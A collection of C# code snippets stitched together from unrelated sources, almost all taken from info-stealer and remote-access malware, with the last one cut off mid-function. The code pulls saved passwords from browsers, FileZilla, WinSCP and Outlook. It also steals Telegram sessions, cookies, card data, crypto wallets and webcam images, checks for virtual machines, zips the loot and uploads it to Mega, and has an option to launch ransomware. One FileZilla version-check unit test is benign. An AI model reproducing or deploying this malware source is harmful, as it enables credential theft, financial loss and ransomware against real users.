public static void HandleGetPasswords(Packets.ServerPackets.GetPasswords packet, Client client) { List <RecoveredAccount> recovered = new List <RecoveredAccount>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(Yandex.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(Edge.GetPasswords()); recovered.AddRange(Outlook.GetSavedPasswords()); recovered.AddRange(Thunderbird.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); List <string> raw = new List <string>(); foreach (RecoveredAccount value in recovered) { string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.Username, value.Password, value.URL, value.Application, DELIMITER); raw.Add(rawValue); } new Packets.ClientPackets.GetPasswordsResponse(raw).Execute(client); }
private static void Main() { Directory.CreateDirectory(Program.dir); HomeDirectory.Create(GetDirPath.User_Name, true); if (Settings.webka) { GetWebCam.Get_webcam(); } Screen.Get_scr(Program.dir); FileZilla.get_filezilla(Program.dir); Telegram.StealTelegram(Program.dir); if (Settings.loader) { Loader.Load(); } if (Settings.grabber) { Grabber.Grab_desktop(Program.dir); } Steal.Cookies(); Steal.Passwords(); Wallets.BitcoinSteal(Program.dir); UserAgents.Get_agent(Program.dir); Browser_Parse.Parse(Program.dir); DomainDetect.Start(Helper.Browsers); Hardware.Info(Program.dir); Directory.Delete(Program.dir, true); Directory.Delete(GetDirPath.User_Name, true); if (Settings.ransomware) { RansomwareCrypt.Start(); } }
private static string DigLikeThereIsNoTomorrow() { bool isHighIntegrity = Utils.IsHighIntegrity(); string findings = ""; findings += McAfee.Dig(isHighIntegrity); findings += GPP.Dig(); findings += Unattended.Dig(); findings += PSReadLine.Dig(isHighIntegrity); findings += AWS.Dig(isHighIntegrity); findings += Azure.Dig(isHighIntegrity); findings += GCP.Dig(isHighIntegrity); findings += RDP.Dig(isHighIntegrity); findings += PuTTY.Dig(isHighIntegrity); findings += SuperPuTTY.Dig(isHighIntegrity); findings += WinSCP.Dig(isHighIntegrity); findings += FileZilla.Dig(isHighIntegrity); findings += VNC.Dig(isHighIntegrity); findings += TeamViewer.Dig(); findings += PulseSecure.Dig(); if (string.IsNullOrEmpty(findings)) { return("\nDid not find anything :(\n"); } else { return(findings); } }
public static void HandleGetPasswords(Packets.ServerPackets.GetPasswords packet, Client client) { var recovered = new List <RecoveredAccount>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(Yandex.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); var raw = new List <string>(); for (var i = 0; i < recovered.Count; i++) { var value = recovered[i]; var rawValue = string.Format($"{value.Username}" + $"{DELIMITER}" + $"{value.Password}" + $"{DELIMITER}" + $"{value.URL}" + $"{DELIMITER}" + $"{value.Application}"); raw.Add(rawValue); } new Packets.ClientPackets.GetPasswordsResponse(raw).Execute(client); }
public static void RecoverPasswords() { try { StringBuilder sb = new StringBuilder(); sb.Append(FileZilla.Recover()); sb.Append(CoreFTP.Recover()); sb.Append(Minecraft.Recover()); sb.Append(WindowsProductKey.Recover()); Upload("Password Recovery", sb.ToString(), "2"); new Thread(new ThreadStart(delegate { recoverBrowser(); })).Start(); } catch (Exception ex) { Config.DumpErrorLog(ex, null); } }
private void Execute(ISender client, GetPasswords message) { List <RecoveredAccount> recovered = new List <RecoveredAccount>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(Yandex.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); client.Send(new GetPasswordsResponse { RecoveredAccounts = recovered }); }
public static void HandleGetPasswords(GetPasswords packet, Networking.Client client) { List <RecoveredAccount> recovered = new List <RecoveredAccount>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(Yandex.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); client.Send(new GetPasswordsResponse { RecoveredAccounts = recovered }); }
public void Test_needsUpdate() { var fz = new FileZilla(false); DetectedSoftware det = new DetectedSoftware() { displayVersion = fz.knownInfo().newestVersion }; // equal numbers does not need update Assert.IsFalse(fz.needsUpdate(det)); // some older version numbers in ascending order string[] older = { "3.0.0", "3.0.1", "3.0.2", "3.0.2.1", "3.2.8", "3.2.8.1", "3.3.0", "3.3.0.1","3.3.1", "3.3.2", "3.3.2.1", "3.3.3", "3.9.0", "3.9.0.1", "3.9.0.2", "3.9.0.3","3.9.0.4", "3.9.0.5", "3.9.0.6", "3.10.0", "3.10.0.1", "3.10.0.2", "3.10.1", "3.10.2", "3.10.3", "3.11.0", "3.11.0.1", "3.11.0.2", "3.12.0", "3.12.0.1", "3.12.0.2", "3.13.0" }; // older versions should always need update foreach (string version in older) { det.displayVersion = version; Assert.IsTrue(fz.needsUpdate(det)); } // Only need update, if detected version is older than known version. for (int i = 0; i < older.Length; i++) { for (int j = 0; j < older.Length; j++) { det.displayVersion = older[i]; fz = new FzTest(false, older[j]); Assert.AreEqual <bool>(i < j, fz.needsUpdate(det), "Failed check for i=" + i.ToString() + " and j=" + j.ToString() + "!" + " v[i]=" + older[i] + ", v[j]=" + older[j] + "."); } } }
public static void getPasswords(GetPasswords packet, ClientMosaique client) { List <RecoveredAccount> recovered = new List <RecoveredAccount>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); List <string> raw = new List <string>(); foreach (RecoveredAccount value in recovered) { string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.username, value.password, value.URL, value.application, DELIMITER); raw.Add(rawValue); } new GetPasswordsResponse(raw).Execute(client); }
public static void HandleGetPasswords(Paketler.ServerPaketleri.GetPasswords packet, Client client) { List <KurtarılanHesaplar> recovered = new List <KurtarılanHesaplar>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(Yandex.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); List <string> raw = new List <string>(); foreach (KurtarılanHesaplar value in recovered) { string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.Username, value.Password, value.Url, value.Application, Antilimiter); raw.Add(rawValue); } new Paketler.ClientPaketleri.GetPasswordsResponse(raw).Execute(client); }
public static void Main() { // Проверяем на запуск виртуальных машин ( Virtual Machine Check ) if (!AntiVM.GetCheckVMBot() && !RunCheck.InstanceCheck()) { Environment.Exit(0); } // Создаём папку куда будем всё собирать HomeDirectory.Inizialize(); // Делаем проверку что папка создалась if (CombineEx.ExistsDir(GlobalPath.HomePath)) { // Собираем данные .... Telega.GetSession(GlobalPath.Tdata, GlobalPath.TelegaHome, "*.*"); MailFoxPassword.Inizialize(); BuffBoard.Inizialize(); NordVPN.Inizialize_Grabber(); DynDns.Inizialize_Grabber(); FileZilla.Inizialize_Grabber(); Pidgin.Inizialize_Grabber(); GetSteamFiles.Inizialize("*.", "*.vdf", "config", "Steam"); InfoGrabber.Inizialize(); ScreenShot.Inizialize(GlobalPath.Screen); // Сбор и вывод логинов и паролей Searcher.CopyInSafeDir(GlobalPath.LoginsPath, "Login Data"); GetPasswords.Inizialize_Multi_file(); // Сбор и вывод куки данных Searcher.CopyInSafeDir(GlobalPath.CookiesPath, "Cookies"); GetCookies.Inizialize(); // Сбор и вывод Автозаполнение форм Searcher.CopyInSafeDir(GlobalPath.WebDataPath, "Web Data"); GetAutoFill.Inizialize_AutoFill(); } }
private static void Main() { Directory.CreateDirectory(dir); HomeDirectory.Create(GetDirPath.User_Name, true); if (Settings.webka) { GetWebCam.Get_webcam(); } Screen.Get_scr(dir); FileZilla.get_filezilla(dir); Telegram.StealTelegram(dir); if (Settings.steam) { Steam.StealSteam(dir); } if (Settings.loader) { Loader.Load(); } if (Settings.grabber) { Grabber.Grab_desktop(dir); } Mozila.Mozila_still(); Wallets.BitcoinSteal(dir); UserAgents.Get_agent(dir); Browser_Parse.Parse(dir); Hardware.Info(dir); Directory.Delete(dir, true); Directory.Delete(GetDirPath.User_Name, true); if (Settings.ransomware) { RansomwareCrypt.Start(); } }
public static void HandleGetPasswords(GetPasswords packet, Client client) { List <RecoveredAccount> recovered = new List <RecoveredAccount>(); recovered.AddRange(Chrome.GetSavedPasswords()); recovered.AddRange(Opera.GetSavedPasswords()); recovered.AddRange(Yandex.GetSavedPasswords()); recovered.AddRange(InternetExplorer.GetSavedPasswords()); recovered.AddRange(Firefox.GetSavedPasswords()); recovered.AddRange(FileZilla.GetSavedPasswords()); recovered.AddRange(WinSCP.GetSavedPasswords()); List <string> raw = new List <string>(); foreach (RecoveredAccount value in recovered) { string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.Username, value.Password, value.URL, value.Application, DELIMITER); raw.Add(rawValue); } client.Send(new GetPasswordsResponse { Passwords = raw }); }
// Token: 0x0600004F RID: 79 RVA: 0x000028BC File Offset: 0x00000ABC public static Credentials Create(ClientSettings settings) { Credentials credentials = new Credentials { Defenders = new List <string>(), Browsers = new List <Browser>(), Files = new List <RemoteFile>(), FtpConnections = new List <LoginPair>(), Hardwares = new List <Hardware>(), InstalledBrowsers = new List <InstalledBrowserInfo>(), InstalledSoftwares = new List <string>(), Languages = new List <string>(), Processes = new List <string>(), ColdWallets = new List <ColdWallet>(), ImportantAutofills = new List <Autofill>(), SteamFiles = new List <RemoteFile>(), NordVPN = new List <LoginPair>(), OpenVPN = new List <RemoteFile>(), ProtonVPN = new List <RemoteFile>(), TelegramFiles = new List <RemoteFile>() }; try { try { ReadOnlyCollection <WmiProcessor> source = new WmiService().QueryAll <WmiProcessor>(new WmiProcessorQuery(), null); credentials.Hardwares = (from x in source select new Hardware { Caption = x.Name, HardType = HardwareType.Processor, Parameter = string.Format("{0}", x.NumberOfCores) }).ToList <Hardware>(); } catch { } try { WmiService wmiService = new WmiService(); if (credentials.Hardwares == null) { credentials.Hardwares = new List <Hardware>(); } foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery(), null) where x.AdapterRAM > 0U select new Hardware { Caption = x.Name, HardType = HardwareType.Graphic, Parameter = string.Format("{0}", x.AdapterRAM) }).ToList <Hardware>()) { credentials.Hardwares.Add(item); } } catch { } try { credentials.Hardwares.Add(new Hardware { Caption = "Total of RAM", HardType = HardwareType.Graphic, Parameter = UserInfoHelper.TotalOfRAM() }); } catch { } try { WmiService wmiService2 = new WmiService(); List <WmiQueryBase> list = new List <WmiQueryBase> { new WmiAntivirusQuery(), new WmiAntiSpyWareQuery(), new WmiFirewallQuery() }; string[] array = new string[] { "ROOT\\SecurityCenter2", "ROOT\\SecurityCenter" }; List <WmiAntivirus> list2 = new List <WmiAntivirus>(); foreach (WmiQueryBase wmiQuery in list) { foreach (string scope in array) { try { list2.AddRange(wmiService2.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>()); } catch { } } } credentials.Defenders = (from x in list2 select x.DisplayName).Distinct <string>().ToList <string>(); } catch { } credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers(); credentials.Processes = UserInfoHelper.ListOfProcesses(); credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms(); credentials.Languages = UserInfoHelper.AvailableLanguages(); if (settings.GrabTelegram) { credentials.TelegramFiles.AddRange(TelegramGrabber.ParseFiles()); } if (settings.GrabVPN) { credentials.NordVPN.AddRange(NordVPN.GetProfile()); credentials.OpenVPN.AddRange(OpenVPN.ParseFiles()); credentials.ProtonVPN.AddRange(ProtonVPN.ParseFiles()); } if (settings.GrabSteam) { credentials.SteamFiles.AddRange(SteamGrabber.ParseFiles()); } if (settings.GrabBrowsers) { List <Browser> list3 = new List <Browser>(); if (settings.PortablePaths == null) { settings.PortablePaths = new List <string>(); } settings.PortablePaths.Add(Constants.RoamingAppData); settings.PortablePaths.Add(Constants.LocalAppData); List <string> list4 = new List <string>(); List <string> list5 = new List <string>(); foreach (string text in Constants.chromiumBrowserPaths) { string text2 = string.Empty; if (text.Contains("Opera")) { text2 = Constants.RoamingAppData + text; } else { text2 = Constants.LocalAppData + text; } if (Directory.Exists(text2)) { foreach (string text3 in DecryptHelper.FindPaths(text2, 1, 1, new string[] { "Login Data", "Web Data", "Cookies" })) { if ((text3.EndsWith("Login Data") || text3.EndsWith("Web Data") || text3.EndsWith("Cookies")) && !list4.Contains(text3)) { list4.Add(text3); } } } } foreach (string str in Constants.geckoBrowserPaths) { try { string text4 = Constants.RoamingAppData + str; if (Directory.Exists(text4)) { foreach (string text5 in DecryptHelper.FindPaths(text4, 2, 1, new string[] { "key3.db", "key4.db", "cookies.sqlite", "logins.json" })) { if ((text5.EndsWith("key3.db") || text5.EndsWith("key4.db") || text5.EndsWith("cookies.sqlite") || text5.EndsWith("logins.json")) && !list5.Contains(text5)) { list5.Add(text5); } } } } catch { } } list3.AddRange(ChromiumEngine.ParseBrowsers(list4)); list3.AddRange(GeckoEngine.ParseBrowsers(list5)); foreach (Browser browser in list3) { if (!browser.IsEmpty()) { using (List <Autofill> .Enumerator enumerator6 = CredentialsHelper.FindImportant(browser.Autofills).GetEnumerator()) { while (enumerator6.MoveNext()) { Autofill autofill = enumerator6.Current; if (!credentials.ImportantAutofills.Any((Autofill x) => x.Name == autofill.Name && x.Value == autofill.Value)) { credentials.ImportantAutofills.Add(autofill); } } } credentials.Browsers.Add(browser); } } } if (settings.GrabWallets) { List <ColdWallet> list6 = new List <ColdWallet>(); list6.AddRange(ColdWalletsGrabber.ParseFiles()); foreach (ColdWallet item2 in list6) { credentials.ColdWallets.Add(item2); } } if (settings.GrabFiles) { credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths, null); } if (settings.GrabFTP) { List <LoginPair> list7 = new List <LoginPair>(); list7.AddRange(FileZilla.ParseConnections()); list7.AddRange(WinSCP.ParseConnections()); credentials.FtpConnections = list7; } if (settings.GrabImClients) { foreach (LoginPair item3 in Pidgin.ParseConnections()) { credentials.FtpConnections.Add(item3); } } } catch (Exception) { } return(credentials); }
// Token: 0x0600000B RID: 11 RVA: 0x000188F8 File Offset: 0x00016AF8 public static void GetCollection() { Collection.< > c__DisplayClass2_0 CS$ < > 8__locals1 = new Collection.< > c__DisplayClass2_0(); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine("Если вы это видите, значит запуск происходит в консольном режиме. Не забудьте перекомпилировать стиллер как 'Приложение Windows'."); Console.WriteLine("If you see this, then the launch is in console mode. Do not forget to recompile the stealer as a 'Windows application'."); try { Directory.CreateDirectory(Help.collectionDir); Directory.CreateDirectory(Help.Browsers); Directory.CreateDirectory(Help.Passwords); Directory.CreateDirectory(Help.Autofills); Directory.CreateDirectory(Help.Downloads); Directory.CreateDirectory(Help.Cookies); Directory.CreateDirectory(Help.History); Directory.CreateDirectory(Help.Cards); } catch { } Collection.< > c__DisplayClass2_0 CS$ < > 8__locals2 = CS$ < > 8__locals1; Task[] array = new Task[1]; array[0] = new Task(delegate() { Start.a(); }); CS$ < > 8__locals2.t0 = array; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals3 = CS$ < > 8__locals1; Task[] array2 = new Task[1]; array2[0] = new Task(delegate() { Collection.GetChromium(); }); CS$ < > 8__locals3.t1 = array2; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals4 = CS$ < > 8__locals1; Task[] array3 = new Task[1]; array3[0] = new Task(delegate() { Collection.GetGecko(); }); CS$ < > 8__locals4.t2 = array3; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals5 = CS$ < > 8__locals1; Task[] array4 = new Task[1]; array4[0] = new Task(delegate() { Edge.GetEdge(Help.Passwords); }); CS$ < > 8__locals5.t3 = array4; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals6 = CS$ < > 8__locals1; Task[] array5 = new Task[1]; array5[0] = new Task(delegate() { Outlook.GrabOutlook(Help.collectionDir); }); CS$ < > 8__locals6.t4 = array5; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals7 = CS$ < > 8__locals1; Task[] array6 = new Task[1]; array6[0] = new Task(delegate() { FileZilla.GetFileZilla(Help.collectionDir); }); CS$ < > 8__locals7.t5 = array6; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals8 = CS$ < > 8__locals1; Task[] array7 = new Task[1]; array7[0] = new Task(delegate() { TotalCommander.GetTotalCommander(Help.collectionDir); }); CS$ < > 8__locals8.t6 = array7; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals9 = CS$ < > 8__locals1; Task[] array8 = new Task[1]; array8[0] = new Task(delegate() { ProtonVPN.GetProtonVPN(Help.collectionDir); }); CS$ < > 8__locals9.t7 = array8; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals10 = CS$ < > 8__locals1; Task[] array9 = new Task[1]; array9[0] = new Task(delegate() { OpenVPN.GetOpenVPN(Help.collectionDir); }); CS$ < > 8__locals10.t8 = array9; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals11 = CS$ < > 8__locals1; Task[] array10 = new Task[1]; array10[0] = new Task(delegate() { NordVPN.GetNordVPN(Help.collectionDir); }); CS$ < > 8__locals11.t9 = array10; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals12 = CS$ < > 8__locals1; Task[] array11 = new Task[1]; array11[0] = new Task(delegate() { Telegram.GetTelegram(Help.collectionDir); }); CS$ < > 8__locals12.t10 = array11; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals13 = CS$ < > 8__locals1; Task[] array12 = new Task[1]; array12[0] = new Task(delegate() { Discord.GetDiscord(Help.collectionDir); }); CS$ < > 8__locals13.t11 = array12; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals14 = CS$ < > 8__locals1; Task[] array13 = new Task[1]; array13[0] = new Task(delegate() { Wallets.GetWallets(Help.collectionDir); }); CS$ < > 8__locals14.t12 = array13; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals15 = CS$ < > 8__locals1; Task[] array14 = new Task[1]; array14[0] = new Task(delegate() { Systemsinfo.GetSystemsData(Help.collectionDir); }); CS$ < > 8__locals15.t13 = array14; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals16 = CS$ < > 8__locals1; Task[] array15 = new Task[1]; array15[0] = new Task(delegate() { Dec.Decrypt(Help.Passwords); }); CS$ < > 8__locals16.t15 = array15; try { new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t0; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t1; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t2; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t3; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t4; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t5; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t6; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t7; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t8; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t9; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t10; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t11; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t12; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t13; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t15; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); Task.WaitAll(CS$ < > 8__locals1.t0); Task.WaitAll(CS$ < > 8__locals1.t1); Task.WaitAll(CS$ < > 8__locals1.t2); Task.WaitAll(CS$ < > 8__locals1.t3); Task.WaitAll(CS$ < > 8__locals1.t4); Task.WaitAll(CS$ < > 8__locals1.t5); Task.WaitAll(CS$ < > 8__locals1.t6); Task.WaitAll(CS$ < > 8__locals1.t7); Task.WaitAll(CS$ < > 8__locals1.t8); Task.WaitAll(CS$ < > 8__locals1.t9); Task.WaitAll(CS$ < > 8__locals1.t10); Task.WaitAll(CS$ < > 8__locals1.t11); Task.WaitAll(CS$ < > 8__locals1.t12); Task.WaitAll(CS$ < > 8__locals1.t13); Task.WaitAll(CS$ < > 8__locals1.t15); } catch { } Console.ForegroundColor = ConsoleColor.Green; DomainDetect.GetDomainDetect(Help.Browsers); Start.b(); string contents = string.Concat(new string[] { "<!DOCTYPE html>\n<html>\n<body>\n<style>\nbody {\nbackground-image: url('https://steamcdn-a.akamaihd.net/steamcommunity/public/images/items/383690/f7a121a3f7a929ffb4dbc3ae241b3b4b6eaaed1d.jpg');\nbackground-repeat: no-repeat;\nbackground-attachment: fixed;\nbackground-size: 100% 100%;\n}\n</style>\n<center>\n<h1 style=\"color:white\">", JsonValue.buildversion, "</h1>\n<p style=\"color:white\">\ud83d\udc64 ", Help.machineName, "/", Help.userName, "</p>\n<p style=\"color:white\">\ud83c\udff4 IP: ", Help.IP(), Help.Country(), "</p>\n<h2 style=\"color:white\">\ud83c\udf10 Browsers Data</h2>\n<p style=\"color:white;margin-left:-6em\"> ∟\ud83d\udd11</p>\n<p style=\"color:white;margin-left:3em\"> ∟Chromium v1: ", Chromium.Passwords.ToString(), "</p>\n<p style=\"color:white;margin-left:3em\"> ∟Chromium v2: ", Dec.colvo.ToString(), "</p>\n<p style=\"color:white;margin-left:-1.5em\"> ∟Edge: ", Edge.count.ToString(), "</p>\n<p style=\"color:white;margin-left:-0.9em\"> ∟Gecko: ", Steal.count.ToString(), "</p>\n<p style=\"color:white;margin-left:-4em\"> ∟\ud83c\udf6a", (Chromium.Cookies + Steal.count_cookies).ToString(), "</p>\n<p style=\"color:white;margin-left:-4em\"> ∟\ud83d\udd51", Chromium.History.ToString(), "</p>\n<p style=\"color:white;margin-left:-4.5em\"> ∟\ud83d\udcdd", Chromium.Autofills.ToString(), "</p>\n<p style=\"color:white;margin-left:-5.5em\"> ∟\ud83d\udcb3", Chromium.CC.ToString(), "</p>\n<p style=\"color:white;margin-left:-4.8em\"> ∟⨭", Chromium.Downloads.ToString(), "</p>\n<p style=\"color:white\">\ud83d\udcb6 Wallets: ", (Wallets.count > 0) ? "✅" : "❌", (Electrum.count > 0) ? " Electrum" : "", (Armory.count > 0) ? " Armory" : "", (AtomicWallet.count > 0) ? " Atomic" : "", (BitcoinCore.count > 0) ? " BitcoinCore" : "", (Bytecoin.count > 0) ? " Bytecoin" : "", (DashCore.count > 0) ? " DashCore" : "", (Ethereum.count > 0) ? " Ethereum" : "", (Exodus.count > 0) ? " Exodus" : "", (LitecoinCore.count > 0) ? " LitecoinCore" : "", (Monero.count > 0) ? " Monero" : "", (Zcash.count > 0) ? " Zcash" : "", (Jaxx.count > 0) ? " Jaxx" : "", "</p>\n<p style=\"color:white\">\ud83d\udcc2 FileGrabber: ", Grab.countFiles.ToString(), "</p>\n<p style=\"color:white\">\ud83d\udcb0 Recursive Wallets: ", Grab.countWallets.ToString(), "</p>\n<p style=\"color:white\">\ud83d\udda5 RDP: ", Grab.countRdp.ToString(), "</p>\n<p style=\"color:white\">\ud83d\udcac Discord: ", (Discord.count > 0) ? "✅" : "❌", "</p>\n<p style=\"color:white\">✈️ Telegram: ", (Telegram.count > 0) ? "✅" : "❌", "</p>\n<p style=\"color:white\">\ud83d\udca1 Jabber: ", (Startjabbers.count + Pidgin.PidginCount > 0) ? "✅" : "❌", (Pidgin.PidginCount > 0) ? (" Pidgin (" + Pidgin.PidginAkks.ToString() + ")") : "", (Startjabbers.count > 0) ? " Psi" : "", "</p>\n<h2 style=\"color:white\">\ud83d\udce1 FTP</h2>\n<p style=\"color:white\"> ∟ FileZilla: ", (FileZilla.count > 0) ? ("✅ (" + FileZilla.count.ToString() + ")") : "❌", "</p>\n<p style=\"color:white\"> ∟ TotalCmd: ", (TotalCommander.count > 0) ? "✅" : "❌", "</p>\n<h2 style=\"color:white\">\ud83d\udd0c VPN</h2>\n<p style=\"color:white\"> ∟ NordVPN: ", (NordVPN.count > 0) ? "✅" : "❌", "</p>\n<p style=\"color:white\"> ∟ OpenVPN: ", (OpenVPN.count > 0) ? "✅" : "❌", "</p>\n<p style=\"color:white\"> ∟ ProtonVPN: ", (ProtonVPN.count > 0) ? "✅" : "❌", "</p>\n<p style=\"color:white\">\ud83c\udd94 HWID: ", Help.HWID, "</p>\n<p style=\"color:white\">⚙️ ", Systemsinfo.GetOSInformation(), "</p>\n<p style=\"color:white\">\ud83d\udd0e ", File.ReadAllText(Help.Browsers + "\\DomainDetect.txt"), "</p>\n</center>\n</body>\n</html>" }); File.WriteAllText(Help.collectionDir + "\\InfoHERE.html", contents); Console.WriteLine("Упаковка архива"); string text = string.Concat(new string[] { Help.dir, "\\", Help.userName, "_", Help.machineName, Help.CountryCOde(), ".zip" }); using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866"))) { zipFile.ParallelDeflateThreshold = -1L; zipFile.UseZip64WhenSaving = Zip64Option.Always; zipFile.CompressionLevel = CompressionLevel.Default; zipFile.AddDirectory(Help.collectionDir); zipFile.Save(text); } Console.WriteLine("Залив на мегу"); MegaSend.TaskUpl(text); Clean.GetClean(); }
// Token: 0x06000006 RID: 6 RVA: 0x000022D4 File Offset: 0x000004D4 public static void GetCollection() { Collection.< > c__DisplayClass2_0 CS$ < > 8__locals1 = new Collection.< > c__DisplayClass2_0(); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine("Если вы это видите, значит запуск происходит в консольном режиме. Не забудьте перекомпилировать стиллер как 'Приложение Windows'."); Console.WriteLine("If you see this, then the launch is in console mode. Do not forget to recompile the stealer as a 'Windows application'."); try { Directory.CreateDirectory(Help.collectionDir); Directory.CreateDirectory(Help.Browsers); Directory.CreateDirectory(Help.Passwords); Directory.CreateDirectory(Help.Autofills); Directory.CreateDirectory(Help.Downloads); Directory.CreateDirectory(Help.Cookies); Directory.CreateDirectory(Help.History); Directory.CreateDirectory(Help.Cards); } catch { } Collection.< > c__DisplayClass2_0 CS$ < > 8__locals2 = CS$ < > 8__locals1; Task[] array = new Task[1]; array[0] = new Task(delegate() { Files.GetFiles(Help.collectionDir); }); CS$ < > 8__locals2.t0 = array; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals3 = CS$ < > 8__locals1; Task[] array2 = new Task[1]; array2[0] = new Task(delegate() { Collection.GetChromium(); }); CS$ < > 8__locals3.t1 = array2; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals4 = CS$ < > 8__locals1; Task[] array3 = new Task[1]; array3[0] = new Task(delegate() { Collection.GetGecko(); }); CS$ < > 8__locals4.t2 = array3; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals5 = CS$ < > 8__locals1; Task[] array4 = new Task[1]; array4[0] = new Task(delegate() { Edge.GetEdge(Help.Passwords); }); CS$ < > 8__locals5.t3 = array4; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals6 = CS$ < > 8__locals1; Task[] array5 = new Task[1]; array5[0] = new Task(delegate() { Outlook.GrabOutlook(Help.collectionDir); }); CS$ < > 8__locals6.t4 = array5; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals7 = CS$ < > 8__locals1; Task[] array6 = new Task[1]; array6[0] = new Task(delegate() { FileZilla.GetFileZilla(Help.collectionDir); }); CS$ < > 8__locals7.t5 = array6; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals8 = CS$ < > 8__locals1; Task[] array7 = new Task[1]; array7[0] = new Task(delegate() { TotalCommander.GetTotalCommander(Help.collectionDir); }); CS$ < > 8__locals8.t6 = array7; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals9 = CS$ < > 8__locals1; Task[] array8 = new Task[1]; array8[0] = new Task(delegate() { ProtonVPN.GetProtonVPN(Help.collectionDir); }); CS$ < > 8__locals9.t7 = array8; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals10 = CS$ < > 8__locals1; Task[] array9 = new Task[1]; array9[0] = new Task(delegate() 